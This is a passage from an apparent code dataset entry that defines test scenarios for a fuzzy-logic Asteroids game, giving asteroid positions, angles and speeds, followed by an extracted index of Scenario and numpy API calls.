{"position": (350, 400), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 450), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 500), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 550), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 600), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 400), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 450), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 500), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 550), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 600), "angle": 0.0, "speed": 0, "size": 2},
],
ship_state={"position": (400, 300)},
seed=0
)
|
[
"numpy.linspace",
"numpy.cos",
"numpy.sin",
"numpy.meshgrid",
"fuzzy_asteroids.util.Scenario"
] |
[((224, 430), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_1"""', 'asteroid_states': "[{'position': (0, 300), 'angle': -90.0, 'speed': 40}, {'position': (700, \n 300), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (600, 300)}", 'seed': '(0)'}), "(name='threat_test_1', asteroid_states=[{'position': (0, 300),\n 'angle': -90.0, 'speed': 40}, {'position': (700, 300), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (600, 300)}, seed=0)\n", (232, 430), False, 'from fuzzy_asteroids.util import Scenario\n'), ((502, 709), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_2"""', 'asteroid_states': "[{'position': (800, 300), 'angle': 90.0, 'speed': 40}, {'position': (100, \n 300), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (200, 300)}", 'seed': '(0)'}), "(name='threat_test_2', asteroid_states=[{'position': (800, 300),\n 'angle': 90.0, 'speed': 40}, {'position': (100, 300), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (200, 300)}, seed=0)\n", (510, 709), False, 'from fuzzy_asteroids.util import Scenario\n'), ((781, 985), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_3"""', 'asteroid_states': "[{'position': (400, 0), 'angle': 0.0, 'speed': 40}, {'position': (400, 550),\n 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 450)}", 'seed': '(0)'}), "(name='threat_test_3', asteroid_states=[{'position': (400, 0),\n 'angle': 0.0, 'speed': 40}, {'position': (400, 550), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 450)}, seed=0)\n", (789, 985), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1057, 1264), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""threat_test_4"""', 'asteroid_states': "[{'position': (400, 600), 'angle': 180.0, 'speed': 40}, {'position': (400, \n 50), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 150)}", 'seed': '(0)'}), "(name='threat_test_4', asteroid_states=[{'position': (400, 600),\n 'angle': 180.0, 'speed': 40}, {'position': (400, 50), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 150)}, seed=0)\n", (1065, 1264), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1356, 1525), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_1"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 90.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_1', asteroid_states=[{'position': (400, 500),\n 'angle': 90.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (1364, 1525), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1578, 1748), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_2"""', 'asteroid_states': "[{'position': (400, 500), 'angle': -90.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_2', asteroid_states=[{'position': (400, 500),\n 'angle': -90.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (1586, 1748), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1801, 1970), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_3"""', 'asteroid_states': "[{'position': (100, 100), 'angle': 0.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_3', asteroid_states=[{'position': (100, 100),\n 'angle': 0.0, 'speed': 120, 'size': 1}], ship_state={'position': 
(400, \n 100)}, seed=0)\n", (1809, 1970), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2022, 2191), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_4"""', 'asteroid_states': "[{'position': (700, 100), 'angle': 0.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_4', asteroid_states=[{'position': (700, 100),\n 'angle': 0.0, 'speed': 120, 'size': 1}], ship_state={'position': (400, \n 100)}, seed=0)\n", (2030, 2191), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2243, 2413), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_5"""', 'asteroid_states': "[{'position': (100, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_5', asteroid_states=[{'position': (100, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (2251, 2413), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2466, 2636), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_6"""', 'asteroid_states': "[{'position': (700, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_6', asteroid_states=[{'position': (700, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (2474, 2636), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2689, 2874), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_7"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100), 'angle': 90.0}", 'seed': '(0)'}), "(name='accuracy_test_7', asteroid_states=[{'position': (400, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100), 'angle': 90.0}, seed=0)\n", (2697, 2874), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2927, 3113), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_8"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100), 'angle': -90.0}", 'seed': '(0)'}), "(name='accuracy_test_8', asteroid_states=[{'position': (400, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100), 'angle': -90.0}, seed=0)\n", (2935, 3113), False, 'from fuzzy_asteroids.util import Scenario\n'), ((3166, 3354), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_9"""', 'asteroid_states': "[{'position': (100, 500), 'angle': -135.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (700, 100), 'angle': -90.0}", 'seed': '(0)'}), "(name='accuracy_test_9', asteroid_states=[{'position': (100, 500),\n 'angle': -135.0, 'speed': 120, 'size': 1}], ship_state={'position': (\n 700, 100), 'angle': -90.0}, seed=0)\n", (3174, 3354), False, 'from fuzzy_asteroids.util import Scenario\n'), ((3407, 3593), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_10"""', 'asteroid_states': "[{'position': (700, 500), 'angle': 135.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (100, 100), 'angle': 90.0}", 'seed': '(0)'}), "(name='accuracy_test_10', asteroid_states=[{'position': (700, 500),\n 'angle': 135.0, 'speed': 120, 'size': 1}], ship_state={'position': (100,\n 100), 'angle': 90.0}, seed=0)\n", (3415, 3593), False, 'from 
fuzzy_asteroids.util import Scenario\n'), ((3724, 4106), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_easy"""', 'asteroid_states': "[{'position': (0, 100), 'angle': -90.0, 'speed': 60}, {'position': (0, 200),\n 'angle': -90.0, 'speed': 60}, {'position': (0, 300), 'angle': -90.0,\n 'speed': 60}, {'position': (0, 400), 'angle': -90.0, 'speed': 60}, {\n 'position': (0, 500), 'angle': -90.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_left_easy', asteroid_states=[{'position': (0, 100),\n 'angle': -90.0, 'speed': 60}, {'position': (0, 200), 'angle': -90.0,\n 'speed': 60}, {'position': (0, 300), 'angle': -90.0, 'speed': 60}, {\n 'position': (0, 400), 'angle': -90.0, 'speed': 60}, {'position': (0, \n 500), 'angle': -90.0, 'speed': 60}], ship_state={'position': (400, 300)\n }, seed=0)\n", (3732, 4106), False, 'from fuzzy_asteroids.util import Scenario\n'), ((4307, 4693), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_easy"""', 'asteroid_states': "[{'position': (800, 100), 'angle': 90.0, 'speed': 60}, {'position': (800, \n 200), 'angle': 90.0, 'speed': 60}, {'position': (800, 300), 'angle': \n 90.0, 'speed': 60}, {'position': (800, 400), 'angle': 90.0, 'speed': 60\n }, {'position': (800, 500), 'angle': 90.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_right_easy', asteroid_states=[{'position': (800, 100),\n 'angle': 90.0, 'speed': 60}, {'position': (800, 200), 'angle': 90.0,\n 'speed': 60}, {'position': (800, 300), 'angle': 90.0, 'speed': 60}, {\n 'position': (800, 400), 'angle': 90.0, 'speed': 60}, {'position': (800,\n 500), 'angle': 90.0, 'speed': 60}], ship_state={'position': (400, 300)},\n seed=0)\n", (4315, 4693), False, 'from fuzzy_asteroids.util import Scenario\n'), ((4900, 5405), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_easy"""', 'asteroid_states': "[{'position': (100, 600), 'angle': 180.0, 'speed': 60}, {'position': (200, \n 600), 'angle': 180.0, 'speed': 60}, {'position': (300, 600), 'angle': \n 180.0, 'speed': 60}, {'position': (400, 600), 'angle': 180.0, 'speed': \n 60}, {'position': (500, 600), 'angle': 180.0, 'speed': 60}, {'position':\n (600, 600), 'angle': 180.0, 'speed': 60}, {'position': (700, 600),\n 'angle': 180.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_top_easy', asteroid_states=[{'position': (100, 600),\n 'angle': 180.0, 'speed': 60}, {'position': (200, 600), 'angle': 180.0,\n 'speed': 60}, {'position': (300, 600), 'angle': 180.0, 'speed': 60}, {\n 'position': (400, 600), 'angle': 180.0, 'speed': 60}, {'position': (500,\n 600), 'angle': 180.0, 'speed': 60}, {'position': (600, 600), 'angle': \n 180.0, 'speed': 60}, {'position': (700, 600), 'angle': 180.0, 'speed': \n 60}], ship_state={'position': (400, 300)}, seed=0)\n", (4908, 5405), False, 'from fuzzy_asteroids.util import Scenario\n'), ((5651, 6129), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_easy"""', 'asteroid_states': "[{'position': (100, 0), 'angle': 0.0, 'speed': 60}, {'position': (200, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (300, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (400, 0), 'angle': 0.0, 'speed': 60}, {\n 'position': (500, 0), 'angle': 0.0, 'speed': 60}, {'position': (600, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (700, 0), 'angle': 0.0,\n 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_bottom_easy', 
asteroid_states=[{'position': (100, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (200, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (300, 0), 'angle': 0.0, 'speed': 60}, {\n 'position': (400, 0), 'angle': 0.0, 'speed': 60}, {'position': (500, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (600, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (700, 0), 'angle': 0.0, 'speed': 60}],\n ship_state={'position': (400, 300)}, seed=0)\n", (5659, 6129), False, 'from fuzzy_asteroids.util import Scenario\n'), ((6861, 6968), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_closing"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_closing', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (6869, 6968), False, 'from fuzzy_asteroids.util import Scenario\n'), ((7423, 7534), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_left"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_left', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (7431, 7534), False, 'from fuzzy_asteroids.util import Scenario\n'), ((7951, 8063), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_right"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_right', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (7959, 8063), False, 'from fuzzy_asteroids.util import Scenario\n'), ((8500, 8610), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_top"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_top', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (8508, 8610), False, 'from fuzzy_asteroids.util import Scenario\n'), ((9061, 9174), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_bottom"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_bottom', asteroid_states=ast_states, ship_state=\n {'position': (400, 300)}, seed=0)\n", (9069, 9174), False, 'from fuzzy_asteroids.util import Scenario\n'), ((9563, 9589), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (9574, 9589), True, 'import numpy as np\n'), ((9703, 9749), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (9714, 9749), True, 'import numpy as np\n'), ((10110, 10218), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_left"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (700, 300)}", 'seed': '(0)'}), "(name='corridor_left', asteroid_states=ast_states, ship_state={\n 'position': (700, 300)}, seed=0)\n", (10118, 10218), False, 'from fuzzy_asteroids.util import Scenario\n'), ((10457, 10566), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_right"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (100, 300)}", 'seed': '(0)'}), "(name='corridor_right', asteroid_states=ast_states, ship_state={\n 'position': (100, 300)}, seed=0)\n", (10465, 10566), False, 'from fuzzy_asteroids.util import Scenario\n'), ((10729, 10755), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (10740, 10755), True, 'import 
numpy as np\n'), ((10772, 10818), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (10783, 10818), True, 'import numpy as np\n'), ((11182, 11289), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_top"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='corridor_top', asteroid_states=ast_states, ship_state={\n 'position': (400, 100)}, seed=0)\n", (11190, 11289), False, 'from fuzzy_asteroids.util import Scenario\n'), ((11550, 11660), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_bottom"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 500)}", 'seed': '(0)'}), "(name='corridor_bottom', asteroid_states=ast_states, ship_state={\n 'position': (400, 500)}, seed=0)\n", (11558, 11660), False, 'from fuzzy_asteroids.util import Scenario\n'), ((11998, 12024), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (12009, 12024), True, 'import numpy as np\n'), ((12138, 12184), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (12149, 12184), True, 'import numpy as np\n'), ((12377, 12502), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_1', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 90}, seed=0)\n", (12385, 12502), False, 'from fuzzy_asteroids.util import Scenario\n'), ((12596, 12622), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (12607, 12622), True, 'import numpy as np\n'), ((12736, 12782), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (12747, 12782), True, 'import numpy as np\n'), ((12974, 13100), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': -90}", 'seed': '(0)'}), "(name='moving_corridor_2', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': -90}, seed=0)\n", (12982, 13100), False, 'from fuzzy_asteroids.util import Scenario\n'), ((13292, 13318), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (13303, 13318), True, 'import numpy as np\n'), ((13335, 13381), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (13346, 13381), True, 'import numpy as np\n'), ((13574, 13698), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_3"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 0}", 'seed': '(0)'}), "(name='moving_corridor_3', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 0}, seed=0)\n", (13582, 13698), False, 'from fuzzy_asteroids.util import Scenario\n'), ((13888, 13914), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (13899, 13914), True, 'import numpy as np\n'), ((13931, 13977), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (13942, 13977), True, 'import numpy as np\n'), 
((14168, 14294), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_4"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 180}", 'seed': '(0)'}), "(name='moving_corridor_4', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 180}, seed=0)\n", (14176, 14294), False, 'from fuzzy_asteroids.util import Scenario\n'), ((14394, 14420), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (14405, 14420), True, 'import numpy as np\n'), ((14425, 14451), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (14436, 14451), True, 'import numpy as np\n'), ((14468, 14514), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (14479, 14514), True, 'import numpy as np\n'), ((14866, 14996), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_angled_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (750, 50), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_angled_1', asteroid_states=ast_states,\n ship_state={'position': (750, 50), 'angle': 90}, seed=0)\n", (14874, 14996), False, 'from fuzzy_asteroids.util import Scenario\n'), ((15097, 15123), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (15108, 15123), True, 'import numpy as np\n'), ((15128, 15154), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (15139, 15154), True, 'import numpy as np\n'), ((15171, 15217), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (15182, 15217), True, 'import numpy as np\n'), ((15574, 15705), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_angled_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (750, 550), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_angled_2', asteroid_states=ast_states,\n ship_state={'position': (750, 550), 'angle': 90}, seed=0)\n", (15582, 15705), False, 'from fuzzy_asteroids.util import Scenario\n'), ((15806, 15832), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (15817, 15832), True, 'import numpy as np\n'), ((15837, 15863), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (15848, 15863), True, 'import numpy as np\n'), ((15880, 15926), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (15891, 15926), True, 'import numpy as np\n'), ((16220, 16350), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_curve_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (550, 500), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_curve_1', asteroid_states=ast_states,\n ship_state={'position': (550, 500), 'angle': 90}, seed=0)\n", (16228, 16350), False, 'from fuzzy_asteroids.util import Scenario\n'), ((16451, 16477), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (16462, 16477), True, 'import numpy as np\n'), ((16482, 16508), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (16493, 16508), True, 'import numpy as np\n'), ((16525, 16571), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), 
"(x, y, sparse=False, indexing='ij')\n", (16536, 16571), True, 'import numpy as np\n'), ((16964, 17094), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_curve_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (550, 100), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_curve_2', asteroid_states=ast_states,\n ship_state={'position': (550, 100), 'angle': 90}, seed=0)\n", (16972, 17094), False, 'from fuzzy_asteroids.util import Scenario\n'), ((17545, 17600), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""apocalypse_1"""', 'num_asteroids': '(50)', 'seed': '(1)'}), "(name='apocalypse_1', num_asteroids=50, seed=1)\n", (17553, 17600), False, 'from fuzzy_asteroids.util import Scenario\n'), ((17888, 18395), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_1"""', 'asteroid_states': "[{'position': (600, 0), 'angle': -90.0, 'speed': 80}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (600, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (600, 500), 'angle': -90.0, 'speed': 80}, {'position': (600, 600),\n 'angle': -90.0, 'speed': 80}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_1', asteroid_states=[{'position': (600, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (600, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (600, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (600, 300), 'angle': -90.0, 'speed': 80}, {'position': (600,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (600, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 600), 'angle': -90.0, 'speed': \n 80}], ship_state={'position': (750, 300)}, seed=0)\n", (17896, 18395), False, 'from fuzzy_asteroids.util import Scenario\n'), ((18557, 19063), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_2"""', 'asteroid_states': "[{'position': (750, 0), 'angle': -90.0, 'speed': 80}, {'position': (750, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (750, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (750, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (750, 500), 'angle': -90.0, 'speed': 80}, {'position': (750, 600),\n 'angle': -90.0, 'speed': 80}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_2', asteroid_states=[{'position': (750, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (750, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (750, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (750, 300), 'angle': -90.0, 'speed': 80}, {'position': (750,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (750, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 600), 'angle': -90.0, 'speed': \n 80}], ship_state={'position': (50, 300)}, seed=0)\n", (18565, 19063), False, 'from fuzzy_asteroids.util import Scenario\n'), ((19225, 20134), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_3"""', 'asteroid_states': "[{'position': (600, 0), 'angle': -90.0, 'speed': 80}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (600, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (600, 500), 'angle': -90.0, 'speed': 80}, {'position': (600, 600),\n 'angle': 
-90.0, 'speed': 80}, {'position': (200, 0), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 100), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 300), 'angle': -90.0, 'speed': 0}, {'position': (200, 400), 'angle': -\n 90.0, 'speed': 0}, {'position': (200, 500), 'angle': -90.0, 'speed': 0},\n {'position': (200, 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_3', asteroid_states=[{'position': (600, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (600, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (600, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (600, 300), 'angle': -90.0, 'speed': 80}, {'position': (600,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (600, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 600), 'angle': -90.0, 'speed': \n 80}, {'position': (200, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 200, 100), 'angle': -90.0, 'speed': 0}, {'position': (200, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (200, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 500), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (750, 300)},\n seed=0)\n", (19233, 20134), False, 'from fuzzy_asteroids.util import Scenario\n'), ((20417, 21325), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_4"""', 'asteroid_states': "[{'position': (750, 0), 'angle': -90.0, 'speed': 80}, {'position': (750, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (750, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (750, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (750, 500), 'angle': -90.0, 'speed': 80}, {'position': (750, 600),\n 'angle': -90.0, 'speed': 80}, {'position': (200, 0), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 100), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 300), 'angle': -90.0, 'speed': 0}, {'position': (200, 400), 'angle': -\n 90.0, 'speed': 0}, {'position': (200, 500), 'angle': -90.0, 'speed': 0},\n {'position': (200, 600), 